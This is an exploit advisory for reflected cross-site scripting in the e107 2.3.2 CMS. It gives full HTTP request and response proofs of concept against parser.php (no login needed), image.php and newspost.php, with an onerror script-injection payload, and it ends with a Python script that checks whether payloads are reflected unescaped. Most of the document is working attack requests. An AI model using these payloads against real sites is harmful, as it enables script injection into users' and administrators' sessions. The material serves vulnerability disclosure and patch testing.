# Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - unauthenticated (no session cookie required)

URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content

The value of `content` (mode=tohtml) is echoed back in the response with its `"` and `>` characters intact, so attacker-controlled markup lands in the page unencoded. The request below carries no Cookie header.

# POC

Request:

POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/>bb&mode=tohtml

Response:

HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8

Lore"/>bb

### XSS Reflected - authenticated (admin area)

URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for

The `for` parameter is sent double URL-encoded; decoded it reads `_commonh5it1"><img src=a onerror=alert(1)>dezaw`. The page builds an attribute value from it, and the `">` in the payload closes that attribute and tag.

# POC 1

Request:

GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close

Response:

HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

Media Manager - Admin Area :: hacked">bbbbb
[...]
dezaw&path=">
No HTML5 support.
[...]

# POC 2

URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: payload in the URL path (PATH_INFO after newspost.php, not a query parameter)

Request:

GET /e107/e107_admin/newspost.php/sdd4h">kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close

Response:

HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

News - List - Admin Area :: hacked">bbbbb
[...]
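A checker for the two reflections above (the unauthenticated parser.php POST and the admin-only image.php GET), as an added example that is not part of the advisory or of e107 itself. It sends the same requests the PoCs use but replaces alert(1) with a random canary wrapped around the metacharacters, then classifies whether the canary came back with `"` and `>` intact (the condition the advisory demonstrates), entity-encoded (what a fix with htmlspecialchars would produce), stripped, or not at all. The base URL, the double URL-encoding of `for` (copied from the PoC 1 URL), and the hand-supplied admin PHPSESSID are my assumptions.

```python
"""Reflection checker for the e107 2.3.2 reflected-XSS PoCs (added example).

Assumptions (mine, not the advisory's): BASE points at the local XAMPP
install used in the advisory; the admin session id for image.php is
passed on the command line; no other parameter names are guessed.
"""
import html
import secrets
import urllib.parse
import urllib.request

BASE = "http://127.0.0.1/e107"  # assumption: same local install as the advisory


def make_canary() -> str:
    # Random token so a hit in the response cannot be a coincidence.
    return "xss" + secrets.token_hex(4)


def payload_for(canary: str) -> str:
    # Same shape as the advisory's payload: close the attribute and tag, then
    # an element with a handler. The canary on both sides lets us tell
    # "reflected raw" from "reflected but encoded" from "markup stripped".
    return f'{canary}"><img src=a onerror=alert(1)>{canary}'


def escaped_payload_for(canary: str) -> str:
    # What PHP's htmlspecialchars($v, ENT_QUOTES) would emit for the payload.
    return html.escape(payload_for(canary), quote=True)


def classify_reflection(body: str, canary: str) -> str:
    """'unescaped': metacharacters intact (exploitable, as in the advisory);
    'escaped': reflected as entities; 'stripped': canary present but the
    markup between the two copies removed; 'absent': not reflected."""
    if payload_for(canary) in body:
        return "unescaped"
    if escaped_payload_for(canary) in body:
        return "escaped"
    if canary in body:
        return "stripped"
    return "absent"


def tinymce_parser_request(canary: str) -> urllib.request.Request:
    # Unauthenticated endpoint: bbcode in `content` is converted to HTML and
    # returned. No Cookie header, matching the advisory's request.
    data = urllib.parse.urlencode(
        {"content": "[html]<p><strong>" + payload_for(canary), "mode": "tohtml"}
    ).encode()
    return urllib.request.Request(
        f"{BASE}/e107_plugins/tinymce4/plugins/e107/parser.php",
        data=data,
        headers={"X-Requested-With": "XMLHttpRequest"},
        method="POST",
    )


def image_dialog_request(canary: str, phpsessid: str) -> urllib.request.Request:
    # Admin endpoint. The advisory's URL carries `for` double URL-encoded
    # (%2522, %253e, ...), so the payload is percent-encoded twice here too.
    twice = urllib.parse.quote(urllib.parse.quote(payload_for(canary), safe=""), safe="")
    query = f"mode=main&action=dialog&for={twice}&tagid=media-cat-image&iframe=1&w=206&image=1"
    return urllib.request.Request(
        f"{BASE}/e107_admin/image.php?{query}",
        headers={"Cookie": f"PHPSESSID={phpsessid}"},
    )


def run_check(req: urllib.request.Request, canary: str) -> str:
    # Fetch the response and classify how the canary came back.
    with urllib.request.urlopen(req, timeout=10) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify_reflection(body, canary)


if __name__ == "__main__":
    import sys

    canary = make_canary()
    print("parser.php (unauthenticated):", run_check(tinymce_parser_request(canary), canary))
    if len(sys.argv) > 1:
        # argv[1]: PHPSESSID copied from a logged-in admin browser session
        print("image.php (admin):", run_check(image_dialog_request(canary, sys.argv[1]), canary))
```

Run it against the test install as `python3 check.py <admin PHPSESSID>`; a result of `unescaped` on a patched build means the sink still emits the raw value, while `escaped` is what you should see once the output is entity-encoded. The canary approach also avoids triggering a real handler in your own browser session during verification.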